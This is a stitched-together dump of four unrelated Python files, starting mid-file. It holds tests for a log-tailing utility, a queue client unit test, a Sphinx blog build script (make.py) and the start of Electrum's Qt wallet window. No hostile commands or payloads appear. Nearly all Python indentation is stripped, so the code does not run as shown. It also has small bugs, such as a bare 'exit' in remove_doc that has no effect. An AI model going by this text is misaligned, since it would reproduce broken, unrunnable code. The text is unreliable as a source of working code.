Do a rollover, as described in __init__().
"""
time.sleep(self.ROLL_DELAY)
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = "%s.%d.gz" % (self.baseFilename, i)
dfn = "%s.%d.gz" % (self.baseFilename, i + 1)
if os.path.exists(sfn):
# print "%s -> %s" % (sfn, dfn)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.baseFilename + ".1.gz"
if os.path.exists(dfn):
os.remove(dfn)
with open(self.baseFilename, "rb") as sf:
with gzip.open(dfn, "wb") as df:
df.writelines(sf)
os.remove(self.baseFilename)
# print "%s -> %s" % (self.baseFilename, dfn)
self.mode = 'wb'
self.stream = self._open()
class MultiLineLogHandler(logging.FileHandler):
ROLL_DELAY = 10
EMIT_DELAY = .01
ENCODING = None
@classmethod
def generate(cls, log_file_path, emits):
count = 0
logger = logging.getLogger(__file__)
handler = cls(log_file_path, encoding=cls.ENCODING)
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(name)-12s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
while count < emits:
try:
count += 1
if count % 2 == 0:
raise NameError("error %08d" % count)
logger.error("No Exception Thrown: %08d", count)
except NameError:
logger.exception("Exception Thrown: %08d", count)
TEST_PATH = os.path.dirname(os.path.abspath(__file__))
filter_count = 0
def test_filter():
work_dir = tempfile.mkdtemp(prefix='tail-test_filter-tail_from_dir')
six.print_('generating log files', work_dir)
test_file = os.path.join(work_dir, 'test.log')
with open(test_file, 'wb') as file_to_tail:
file_name = file_to_tail.name
six.print_('file to tail with filter', file_to_tail)
for i in range(1000):
if i % 2 == 0:
line = "odd: %d\n" % i
else:
line = "even: %d\n" % i
file_to_tail.write(line)
def consumer_gen():
global filter_count
while True:
record = yield ()
filter_count += 1
consumer = consumer_gen()
consumer.send(None)
vargs = [__name__, '--only-backfill', '--clear-checkpoint', '--filter-re=odd:\\s*\\d+']
vargs.append(test_file)
main(vargs, consumer)
assert (500 == filter_count)
BACKFILL_EMITS = 50
def test_backfill(log_handler=RotatingWithDelayFileHandler, consumer=None, tail_to_dir=None, vargs=None):
tail_from_dir = tempfile.mkdtemp(prefix='tail-test_backfill-tail_from_dir')
six.print_('generating log files', tail_from_dir)
log_handler.generate(os.path.join(tail_from_dir, 'test.log'), BACKFILL_EMITS)
if not tail_to_dir:
tail_to_dir = tempfile.mkdtemp(prefix='tail-test_backfill-tail_to_dir')
if not consumer:
def consumer_gen():
while True:
record = yield ()
open(os.path.join(tail_to_dir, record[1][0]), 'ab').write(record[2])
consumer = consumer_gen()
consumer.send(None)
six.print_('start tailer', tail_to_dir)
source_pattern = os.path.join(tail_from_dir, '*')
if not vargs:
vargs = [__name__, '--only-backfill', '--clear-checkpoint']
vargs.append(source_pattern)
main(vargs, consumer)
cmp_files(source_pattern, tail_to_dir, lambda x: Tailer.make_sig(x))
six.print_('all done', tail_to_dir)
# for src_file_path in glob.glob(source_pattern):
# dst_file_path = os.path.join(tail_to_dir, Tailer.make_sig(src_file_path))
# six.print_("testing:", src_file_path, dst_file_path)
# assert (Tailer.file_opener(src_file_path).read() == Tailer.file_opener(dst_file_path).read())
def test_gzip_backfill():
test_backfill(RotatingGzipFileHandler)
tailed_records = 0
def test_multiline_records():
tail_to_dir = tempfile.mkdtemp(prefix='ml')
def consumer_gen(path):
global tailed_records
while True:
record = yield ()
tailed_records += 1
open(os.path.join(path, record[1][0]), 'ab').write(record[2])
consumer = consumer_gen(tail_to_dir)
consumer.send(None)
start_of_record_re = '\d{4}-\d{2}-\d{2}'
vargs = [__name__, '--only-backfill', '--clear-checkpoint', "--start-of-record-re=%s" % start_of_record_re]
test_backfill(MultiLineLogHandler, consumer, tail_to_dir, vargs=vargs)
    six.print_('emitted %d and tailed %s' % (BACKFILL_EMITS, tailed_records))
assert (BACKFILL_EMITS == tailed_records)
#
#
# test against simple tail
#
def test_tail():
tmp_dir = tempfile.mkdtemp(prefix='tail-test')
log_file_path = os.path.join(tmp_dir, 'file.log')
six.print_(log_file_path)
class SimpleLogger(Logger):
def __init__(self):
self.RUNNING = False
super(SimpleLogger, self).__init__()
def emit(self, count):
open(log_file_path, 'ab').write("%08d. %s\n" % (count, 'x' * 64))
time.sleep(0.1)
loggen_thread = SimpleLogger()
loggen_thread.start()
six.print_('logger started')
copy_dir = tempfile.mkdtemp(prefix='tail-test')
six.print_(copy_dir)
def gx():
while True:
record = yield ()
open(os.path.join(copy_dir, record[1][0]), 'ab').write(record[2])
consumer = gx()
consumer.send(None)
tailer = Tailer(only_backfill=False)
tailer_thread = threading.Thread(target=tailer.run, args=(log_file_path, consumer))
tailer_lag = 30
logger_lag = 60
loggen_thread.join(tailer_lag)
six.print_('logger run more than %d secs, start tailer' % tailer_lag)
tailer_thread.start()
six.print_('tail started')
six.print_('run logger %d secs more' % (logger_lag - tailer_lag))
loggen_thread.join(logger_lag - tailer_lag)
six.print_('stop logger')
loggen_thread.RUNNING = False
if loggen_thread.is_alive():
loggen_thread.join()
log_files = glob.glob(os.path.join(tmp_dir, '*'))
six.print_('logger stopped')
tailer_thread.join(5)
six.print_('wait for tailer to idle')
copy_pattern = os.path.join(copy_dir, '*')
while True:
six.print_('log files %d == files processed %d' % (len(log_files), len(glob.glob(copy_pattern))))
if tailer.state == tailer.WAITING and len(log_files) == len(glob.glob(copy_pattern)):
break
time.sleep(1)
six.print_('stop tailer')
tailer.state = tailer.STOPPED
tailer_thread.join()
six.print_('tailer stopped')
cmp_files(log_file_path, copy_dir, lambda x: str(Tailer.make_sig(x)))
def test_tail_with_break():
tmp_dir = tempfile.mkdtemp(prefix='tail-test')
log_file_path = os.path.join(tmp_dir, 'file.log')
six.print_(log_file_path)
class SimpleLogger(Logger):
def __init__(self):
self.RUNNING = False
super(SimpleLogger, self).__init__()
def emit(self, count):
open(log_file_path, 'ab').write(("%08d. %s\n" % (count, 'x' * 64)).encode('utf-8'))
time.sleep(0.1)
class BreakingTailer(Tailer):
def __init__(self):
super(BreakingTailer, self).__init__(only_backfill=False)
self.interrupt = threading.Event()
def handoff(self, file_tailed, checkpoint, record, receiver=None):
if self.interrupt.is_set():
raise SystemExit()
super(BreakingTailer, self).handoff(file_tailed, checkpoint, record, receiver)
loggen_thread = SimpleLogger()
loggen_thread.start()
six.print_('logger started')
copy_dir = tempfile.mkdtemp(prefix='tail-test')
six.print_(copy_dir)
def gx():
while True:
record = yield ()
open(os.path.join(copy_dir, record[1][0]), 'ab').write(record[2])
consumer = gx()
consumer.send(None)
tailer = BreakingTailer()
tailer_thread = threading.Thread(target=tailer.run, args=(log_file_path, consumer))
tailer_lag = 40
logger_lag = 80
loggen_thread.join(tailer_lag)
six.print_('logger ran for about %d secs, starting tailer' % tailer_lag)
tailer_thread.start()
six.print_('tail started')
six.print_('run logger %d secs more' % (logger_lag - tailer_lag))
loggen_thread.join(logger_lag - tailer_lag - 20)
six.print_('stopping tailer')
tailer.interrupt.set()
six.print_('waiting for tailer to stop')
loggen_thread.join(5)
six.print_('tailer stopped - starting again')
tailer = BreakingTailer()
tailer_thread = threading.Thread(target=tailer.run, args=(log_file_path, consumer))
tailer_thread.start()
loggen_thread.join(logger_lag - tailer_lag)
loggen_thread.RUNNING = False
if loggen_thread.is_alive():
loggen_thread.join()
six.print_('logger stopped')
tailer_thread.join(10)
six.print_('wait for tailer to idle')
log_files = glob.glob(os.path.join(tmp_dir, '*'))
copy_pattern = os.path.join(copy_dir, '*')
while True:
six.print_('log files %d == files processed %d' % (len(log_files), len(glob.glob(copy_pattern))))
if tailer.state == tailer.WAITING and len(log_files) == len(glob.glob(copy_pattern)):
break
time.sleep(1)
six.print_('stop tailer')
tailer.state = tailer.STOPPED
tailer_thread.join()
six.print_('tailer stopped')
cmp_files(log_file_path, copy_dir, lambda x: str(Tailer.make_sig(x)))
#
#
# test file drop scenario
#
def test_file_drop():
drop_file_name = 'drop_file.txt'
src_file = os.path.join(tempfile.mkdtemp(prefix='test_file_drop-src'), drop_file_name)
dst_file = os.path.join(tempfile.mkdtemp(prefix='test_file_drop-dst'), drop_file_name)
def tail_writer():
while True:
file_name, checkpoint, record = yield ()
open(dst_file, 'ab').write(record)
consumer = tail_writer()
consumer.send(None)
tailer = Tailer()
six.print_("start watch for drop file:", src_file)
six.print_("will save to:", dst_file)
tailer_thread = threading.Thread(target=tailer.run, args=(src_file, consumer))
tailer_thread.start()
tailer_thread.join(10)
def file_drop(num_lines=250):
with open(src_file, 'wb') as dump:
for count in range(num_lines):
dump.write(("%08d. %s\n" % (count + 1, 'x' * 64)).encode('utf-8'))
dump_thread = threading.Thread(target=file_drop)
dump_thread.start()
dump_thread.join()
six.print_('file dropped')
tailer_thread.join(10)
while True:
six.print_('checking for drop file ingest')
if tailer.state == tailer.WAITING and os.path.exists(dst_file):
break
time.sleep(1)
six.print_('pickup complete')
six.print_('stop tailer')
tailer.state = tailer.STOPPED
tailer_thread.join()
six.print_('tailer stopped')
assert (open(src_file, 'rb').read() == open(dst_file, 'rb').read())
cmp_files(src_file, dst_file, lambda x: x)
#
#
# test against rotating log
#
def test_rotating_log():
tmp_dir = tempfile.mkdtemp(prefix='tail-test')
log_file_path = os.path.join(tmp_dir, 'file.log')
six.print_(log_file_path)
class FastRotate(RotatingWithDelayFileHandler):
EMIT_DELAY = 0.3
ROLL_DELAY = 4
class RotatingLogger(Logger):
def __init__(self):
self.RUNNING = False
self.logger = logging.getLogger(__file__)
handler = FastRotate(log_file_path, maxBytes=2048,
backupCount=100)
self.logger.addHandler(handler)
super(RotatingLogger, self).__init__()
def emit(self, count):
self.logger.error("%08d. %s", count, 'x' * 256)
loggen_thread = RotatingLogger()
loggen_thread.start()
six.print_('logger started')
copy_dir = tempfile.mkdtemp(prefix='tail-test')
six.print_(copy_dir)
def gx():
while True:
record = yield ()
open(os.path.join(copy_dir, record[1][0]), 'ab').write(record[2])
consumer = gx()
consumer.send(None)
tailer = Tailer(only_backfill=False, read_pause=2)
tailer_thread = threading.Thread(target=tailer.run, args=(os.path.join(tmp_dir, '*'), consumer))
tailer_lag = 20
logger_run = 40
loggen_thread.join(tailer_lag)
six.print_('logger ran for about %d secs, starting tailer' % tailer_lag)
tailer_thread.start()
six.print_('tail started')
six.print_('run logger %d secs more' % (logger_run - tailer_lag))
loggen_thread.join(logger_run - tailer_lag)
six.print_('stop logger')
loggen_thread.RUNNING = False
if loggen_thread.is_alive():
loggen_thread.join()
log_files = glob.glob(os.path.join(tmp_dir, '*'))
six.print_('logger stopped')
tailer_thread.join(5)
six.print_('wait for tailer to idle')
copy_pattern = os.path.join(copy_dir, '*')
while True:
six.print_('log files %d == files processed %d --> %s' % (len(log_files), len(glob.glob(copy_pattern)),
tailer.state))
if tailer.state == tailer.WAITING and len(log_files) <= len(glob.glob(copy_pattern)):
break
time.sleep(1)
six.print_('stop tailer')
tailer.state = tailer.STOPPED
tailer_thread.join()
six.print_('tailer stopped')
for src_file_path in log_files:
dst_file_path = os.path.join(copy_dir, str(Tailer.make_sig(src_file_path)))
assert (open(src_file_path).read() == open(dst_file_path).read())
# cmp_files(tmp_dir, copy_dir, lambda x: str(Tailer.make_sig(x)))
if __name__ == '__main__':
test_filter()
|
test_client.py
|
import sys
import unittest
import threading
import multiprocessing
from stiqueue.sqserver import SQServer
from stiqueue.sqclient import SQClient
import os
import time
class ClientTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
time.sleep(1)
host = "127.0.0.1"
port = 1234
if 'sqhost' in os.environ:
host = os.environ['sqhost']
if 'sqport' in os.environ:
port = int(os.environ['sqport'])
cls.host = host
cls.port = port
p = multiprocessing.Process(target=cls.start_server, args=(host, port))
p.start()
cls.server_process = p
time.sleep(1)
cls.client = SQClient(host=cls.host, port=cls.port)
@classmethod
def tearDownClass(cls):
print("closing things down")
cls.client.disconnect()
cls.server_process.terminate()
@classmethod
def start_server(cls, host, port):
s = SQServer(host=host, port=port)
s.listen()
def test_send_and_recv(self):
self.client = ClientTest.client
self.client.enq(b"A")
self.client.enq(b"B")
a = self.client.deq()
b = self.client.deq()
empty = self.client.deq()
self.assertEqual(a, b"A")
self.assertEqual(b, b"B")
self.assertEqual(empty, b'')
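# Minimal sketch for running this test module directly (an assumption that it is meant to
# be executable on its own); unittest.main() runs ClientTest, which starts the SQServer
# process in setUpClass and tears it down in tearDownClass.
if __name__ == "__main__":
    unittest.main()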
|
make.py
|
import argparse
import datetime
import os, shutil
import json
from http.server import HTTPServer, SimpleHTTPRequestHandler
import threading
import re
import subprocess
CONFIG = 'docs/_config'
CONFIG_DATABASE = os.path.join(CONFIG, "db.json")
CONFIG_SITEMAP = os.path.join(CONFIG, "sitemap.xml")
SITE_BASEURL = 'https://wklchris.github.io/blog/'
DOCSRC, DOCDST = 'docsrc', 'docs'
ENCODING = 'utf-8'
def docsrc_prefix_path(*path, docsrc_path="docsrc"):
return os.path.join(docsrc_path, *path)
def docdst_prefix_path(*path, docdst_path="docs"):
return os.path.join(docdst_path, *path)
def write_str_into_file(docstr, *path):
fpath = docsrc_prefix_path(*path)
with open(fpath, 'w', encoding=ENCODING) as f:
f.write(docstr)
def read_from_file(fpath, join=True):
with open(fpath ,'r', encoding=ENCODING) as f:
lines = f.readlines()
return lines if not join else ''.join(lines)
def load_json(fpath):
with open(fpath, 'r', encoding=ENCODING) as f:
data = json.load(f)
return data
def sort_dict(dictdata):
return {k: dictdata[k] for k in sorted(dictdata.keys())}
def create_new_doc(docname, doctitle=None):
"""
Create a new document and init it.
"""
if not doctitle:
doctitle = docname
doc_path = docsrc_prefix_path(docname)
if not os.path.isdir(doc_path):
os.mkdir(doc_path)
init_new_doc(docname, doctitle)
print(f"Document '{docname}' has been initialized under '{doc_path}'.")
else:
print(f"Document folder '{docname}' already exist.")
def init_conf_py(docname, doctitle):
"""
Initialize the new document folder with configuration files.
"""
# Read the general conf.py settings from hyperconf.json
hyperconf_path = os.path.join(CONFIG, "hyperconf.json")
doc_conf = load_json(hyperconf_path)
## Add doc-wise information & Sort
doc_conf['year'] = int(f"{datetime.datetime.today():%Y}")
doc_conf['project'] = doctitle
doc_conf = sort_dict(doc_conf)
# Append blog title to canonical url
if 'canonical_url' in doc_conf['html_theme_options']:
doc_conf['html_theme_options']['canonical_url'] += f"{docname}/"
# Write the dict into a .py file
def write_dict_value(dict_val):
## Dict value is either string or int/list
if isinstance(dict_val, str):
write_str = '"{}"'.format(dict_val.strip('"'))
else:
write_str = dict_val
return write_str
conf_str = '\n'.join([
f"{k} = {write_dict_value(v)}" for k,v in doc_conf.items()
])
write_str_into_file(conf_str, docname, "conf.py")
def init_index_rst(docname, doctitle):
"""
Initialize the index.rst for table of content of the document.
"""
rst_config_template = read_from_file(os.path.join(CONFIG, "index.rst"))
title_heading = "{}\n{}\n".format(doctitle, '='*(len(doctitle) + 4))
rst_str = rst_config_template.replace("{{ title heading }}", title_heading)
write_str_into_file(rst_str, docname, "index.rst")
def init_new_doc(docname, doctitle):
"""
Init/Copy files:
+ "conf.py"
+ "index.rst"
"""
init_conf_py(docname, doctitle) # Init conf.py
init_index_rst(docname, doctitle) # Init index.rst
def sphinx_build(docname, update_home=True):
"""
Build the Sphinx website and output the files into the specified folder.
"""
if docname == "_homepage" and update_home:
update_homepage()
return
# Build the HTML website
build_dirname = "build"
build_dir = docsrc_prefix_path(docname, build_dirname)
src_dir = docsrc_prefix_path(docname)
cmd = f"sphinx-build -M html {src_dir} {build_dir}"
os.system(cmd)
# Copy to /docs folder
if docname != "_homepage":
dst_dir = docdst_prefix_path(docname)
else:
dst_dir = docdst_prefix_path("")
shutil.copytree(os.path.join(build_dir, "html"), dst_dir, dirs_exist_ok=True)
# Delete the build folder from src directory
shutil.rmtree(build_dir)
print("---\nHTML pages have been moved into " + dst_dir)
# Automatically update the database & homepage
if docname != "_homepage":
update_database(docname)
if update_home:
update_homepage()
def update_json(json_file, docname, docmeta):
if docname == "_homepage":
return
d = load_json(json_file)
def _treat_as_list(inputs):
return inputs if isinstance(inputs, list) else [inputs]
def _add_doc_to_list(parentkey):
multiple_value_lst = _treat_as_list(docmeta[parentkey])
for child in multiple_value_lst:
children_docs = d[parentkey].get(child, [])
if docname not in children_docs:
children_docs.append(docname)
d[parentkey][child] = sorted(children_docs)
# Delete relevant records first (if docname exists)
if docname in d["blogs"]:
pop_meta = d["blogs"][docname]
for parentkey in "series,keywords,category".split(','):
for key in _treat_as_list(pop_meta[parentkey]):
after_remove = [x for x in d[parentkey][key] if x != docname]
if after_remove:
d[parentkey][key] = after_remove
else: # delete the key if the list is empty
_ = d[parentkey].pop(key, None)
_ = d["blogs"].pop(docname, None)
# If docmeta != None, add relevant records
if docmeta:
# Add to blogs key
d["blogs"][docname] = docmeta
# Add to series key
series_docs = d["series"].get(docmeta["series"], [])
if docname not in series_docs:
series_docs.append(docname)
series_lst = []
for doc in series_docs:
doc_series_num = int(d["blogs"][doc].get("series_num", -1))
series_lst.append((doc_series_num, doc))
d["series"][docmeta["series"]] = [val[1] for val in sorted(series_lst)]
# Add to keywords & category key
for parent_key in "keywords,category".split(','):
_add_doc_to_list(parent_key)
# Update homepage meta
d["_homepage"]["date_modified"] = f"{datetime.datetime.today():%Y-%m-%d}"
# Sort keys and write back to the json file
for k in "_homepage,blogs,category,keywords,series".split(","):
d[k] = sort_dict(d[k])
with open(json_file, 'w', encoding=ENCODING) as f:
json.dump(d, f, indent=4, ensure_ascii=False)
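# Rough sketch of the db.json layout update_json() assumes (field names inferred from the
# code above, not from a documented schema):
#   {
#     "_homepage": {"date_modified": "2023-01-01"},
#     "blogs": {"mydoc": {"series": "...", "series_num": "1", "keywords": ["..."],
#                         "category": "...", "date_build": "2023-01-01", "abstract": "..."}},
#     "series": {"...": ["mydoc"]},
#     "keywords": {"...": ["mydoc"]},
#     "category": {"...": ["mydoc"]}
#   }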
def update_database(docname):
"""
Update the metadata database & sitemap after building the current document.
"""
# Read the meta header of the source document RST
doc_str_lines = read_from_file(docsrc_prefix_path(docname, "index.rst"), join=False)
doc_meta = dict()
for line in doc_str_lines[1:]:
line = line.strip()
if line.startswith(':'):
key, value = line[1:].split(':', 1)
doc_meta[key] = value.strip()
else:
break
# Normalize keywords, record the build date, and keep abstract as the last key
doc_meta["keywords"] = [x.strip() for x in doc_meta["keywords"].split(',')]
doc_meta["date_build"] = f"{datetime.datetime.today():%Y-%m-%d}"
doc_meta["abstract"] = doc_meta.pop("abstract")  # move abstract to the end
# Write into the database
update_json(CONFIG_DATABASE, docname, doc_meta)
# Update sitemap
update_sitemap()
print('Database & sitemap have been updated.')
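# Sketch of the meta header update_database() expects at the top of docsrc/<docname>/index.rst
# (an assumption based on the parsing loop above: the first line is skipped, then ":key: value"
# field lines are read until the first non-field line):
#
#   My Post Title
#   :series: python-notes
#   :series_num: 2
#   :keywords: sphinx, blog
#   :category: tooling
#   :date_init: 2023-01-01
#   :date_modified: 2023-01-02
#   :abstract: One-line summary of the post.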
def update_homepage():
"""
Update & build the homepage based on the latest updated document.
"""
def _generate_blog_datatable():
total_meta = load_json(CONFIG_DATABASE)
blog_list = [doc for doc in total_meta["blogs"].keys() if not doc.startswith('_')]
table_wrapper = lambda tabhtml: f'<table id="tableofblogs" class="display">\n{tabhtml}\n</table>'
def write_tabrow(rowdata, wrapper='tbody'):
inner = 'td' if wrapper == 'tbody' else 'th'
inner_html = '\n'.join([f"<{inner}>{x}</{inner}>" for x in rowdata])
row_html = f"<tr>\n{inner_html}\n</tr>"
return row_html
# Write table head <thead>
head_row = "日志名,分类,摘要,上线,更新".split(',')
head_html = f"<thead>\n{write_tabrow(head_row, 'thead')}\n</thead>"
# Write table body <tbody>
table_rows = ["" for _ in blog_list]
for i, docname in enumerate(blog_list):
doc_meta = total_meta["blogs"][docname]
doc_row = [
f'<a href="{docname}/index.html">{docname}</a>',
doc_meta["category"],
doc_meta["abstract"],
doc_meta["date_init"],
doc_meta["date_modified"]
]
table_rows[i] = write_tabrow(doc_row, 'tbody')
tbody_html = '\n'.join(table_rows)
body_html = f"<tbody>\n{tbody_html}\n</tbody>"
return table_wrapper(f"{head_html}\n{body_html}")
rst_str = read_from_file(os.path.join(CONFIG, "index-homepage.rst"))
blog_table_str = _generate_blog_datatable()
write_str_into_file(blog_table_str, "_homepage", "tableofblogs.html")
# Write it to index.rst and build the homepage
write_str_into_file(rst_str, "_homepage", "index.rst")
sphinx_build("_homepage", update_home=False) # Avoid self-cycle
def update_index_rst_modified_date(docname):
"""
Use 'git diff' to check if any file in docsrc/docname folder has been changed.
If any, update the modified date metadata in index.rst.
"""
meta_key = ":date_modified:"
date_regex = re.compile(r"\d{4}-\d{2}-\d{2}")
def get_command_output(cmdstr):
cmd_strlst = cmdstr.split()
cmd_output = subprocess.run(cmd_strlst, stdout=subprocess.PIPE).stdout.decode('utf-8')
return cmd_output
# Check if there is change in any file that has been:
# * Modified but not staged yet, or
# * Staged
diff_modified = f"git diff --name-only docsrc/{docname}"
output_modified = get_command_output(diff_modified)
diff_staged = f"git diff --name-only --staged docsrc/{docname}"
output_staged = get_command_output(diff_staged)
if len(output_modified) + len(output_staged) > 0:
date_now = f"{datetime.datetime.today():%Y-%m-%d}"
index_rst = read_from_file(docsrc_prefix_path(docname, 'index.rst'), join=False)
# Find the date modified line number
lineindex = -1
for i, line in enumerate(index_rst):
if line.lstrip().startswith(meta_key):
lineindex = i
break
if lineindex >= 0:
index_rst[lineindex] = re.sub(date_regex, date_now, index_rst[lineindex])
# Write back to index.rst
index_rst_str = ''.join(index_rst)
write_str_into_file(index_rst_str, docname, 'index.rst')
print(f"Auto-update modified date in {docname}/index.rst.")
def update_sitemap():
"""
Read blog data from CONFIG_DATABASE and write it into sitemap.
"""
sitemap_str = ('<?xml version="1.0" encoding="UTF-8"?>\n\n'
'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
sitemap_foot = '</urlset>'
def create_sitemap_item(url, lastmod):
item = (
" <url>\n"
f" <loc>{url}</loc>\n"
f" <lastmod>{lastmod}</lastmod>\n"
" </url>"
)
return item
# Read blogs data
db = load_json(CONFIG_DATABASE)
blogs = sort_dict(db["blogs"])
site_lastmod = db["_homepage"]["date_modified"]
site_docs = {}
for dockey in [*blogs.keys(), "_homepage"]:
dirpath = os.path.join(DOCSRC, dockey)
files = [f for f in os.listdir(dirpath) if f.endswith(('.ipynb', '.rst'))]
lastmod = blogs[dockey]["date_build"] if dockey != "_homepage" else site_lastmod
for docpage_fname in files:
pname, _ = os.path.splitext(docpage_fname)
if dockey == '_homepage':
item_url = SITE_BASEURL # Main site canonical url
else:
item_url = f"{SITE_BASEURL}{dockey}/{pname}.html"
site_docs[item_url] = lastmod
# Join all page items
for url, moddate in site_docs.items():
sitemap_item = create_sitemap_item(url, moddate)
sitemap_str += "\n" + sitemap_item
sitemap_str += "\n" + sitemap_foot
with open(CONFIG_SITEMAP, 'w', encoding=ENCODING) as f:
f.write(sitemap_str)
def remove_doc(docname, update_home=True):
"""
Remove a doc from both local file and the database.
"""
check_remove = None
while not check_remove:
user_option = input(f"Are you sure to remove {docname}? [y/n] y: ")
if user_option in list('yn'):
check_remove = user_option
if check_remove == "n":
exit
# Remove source & build directory, if exists
doc_dir = docsrc_prefix_path(docname)
build_dir = docdst_prefix_path(docname)
for dirpath in (doc_dir, build_dir):
if os.path.isdir(dirpath):
shutil.rmtree(dirpath)
# Remove docname key from the database
update_json(CONFIG_DATABASE, docname, None)
if update_home:
update_homepage()
print(f"Removed {docname} from the database, {doc_dir}, and {build_dir}.")
def start_local_server(docname):
"""
Host a mini local server to preview the website before online.
"""
bind, port = "localhost", 8000
if docname == "_homepage":
doc_url = f"http://{bind}:{port}"
else:
doc_url = f"http://{bind}:{port}/{docname}/"
class Handler(SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory=DOCDST, **kwargs)
httpd = HTTPServer((bind, port), Handler)
thread = threading.Thread(target=httpd.serve_forever)
thread.start()
# Open the doc main webpage in the webbrowser
os.system(f'PowerShell -Command "Start-Process -FilePath {doc_url}"')
# Press Enter for server shutdown
_ = input(f'\nHosting server at {bind}:{port}. Press Enter to terminate ...\n\n')
httpd.shutdown()
print('---\nLocal server has been terminated.')
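# Portability note: the PowerShell call above is Windows-specific. A cross-platform
# alternative (not wired in here) would be the standard-library webbrowser module:
#   import webbrowser
#   webbrowser.open(doc_url)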
def enable_args():
parser = argparse.ArgumentParser(
description='Tool for making Sphinx HTML pages.'
)
args_help = {
"docname": "Specify the docname (also project folder name).",
"--create": "Create a new project. Won't overwrite existing ones. (Exclusive to --build)",
"--build": "Build a project. (Exclusive to --create)",
"--title": "Give a title to new project. Only work in --create mode.",
"--config": "Specific the config folder path.",
"--remove": "Remove a document from the website.",
"--no-update-homepage": "Don't autobuild homepage. Work in --build/remove mode.",
"--server": "Host a local server to preview website."
}
parser.add_argument('docname', help=args_help['docname'])
parser_group = parser.add_mutually_exclusive_group()
parser_group.add_argument('--build', '-b', help=args_help['--build'], action='store_true')
parser_group.add_argument('--create', '-c', dest='build', help=args_help["--create"], action='store_false')
parser_group.add_argument('--remove', '-R', help=args_help["--remove"], action='store_true')
parser_group.add_argument('--server', '-s', help=args_help['--server'], action='store_true')
parser_group.set_defaults(build=True, remove=False, server=False)
parser.add_argument('--title', '-t', help=args_help['--title'], nargs='+', default=None)
parser.add_argument('--no-update-homepage', '-N', dest='update_homepage', help=args_help['--no-update-homepage'], action='store_false')
# Exclusive modes: build, create, server, remove.
args = parser.parse_args()
if args.remove:
remove_doc(args.docname, args.update_homepage)
elif args.server:
start_local_server(args.docname)
# Exclusive modes: build, create
elif args.build:
if args.docname == ".":
_doclst = [d for d in os.listdir('docsrc') if not d.startswith('_')]
for d in _doclst:
update_index_rst_modified_date(d)
sphinx_build(d, args.update_homepage)
else:
# Update modified date if docsrc files have changed
update_index_rst_modified_date(args.docname)
sphinx_build(args.docname, args.update_homepage)
else: # create
title = ' '.join(args.title) if args.title else args.docname
create_new_doc(args.docname, title)
# --- Main ---
enable_args()
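# Example invocations (illustrative only; flags as defined in enable_args() above):
#   python make.py mypost --create --title "My Post Title"   # scaffold docsrc/mypost
#   python make.py mypost --build                            # build and copy into docs/mypost
#   python make.py . --build                                 # rebuild every non-underscore doc
#   python make.py mypost --remove                           # delete the doc and its db records
#   python make.py _homepage --server                        # preview the site locally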
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum.util import bh2u, bfh
from electrum import keystore
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled)
from electrum import Transaction
from electrum import util, bitcoin, commands, coinchooser
from electrum import paymentrequest
from electrum.wallet import Multisig_Wallet
try:
from electrum.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
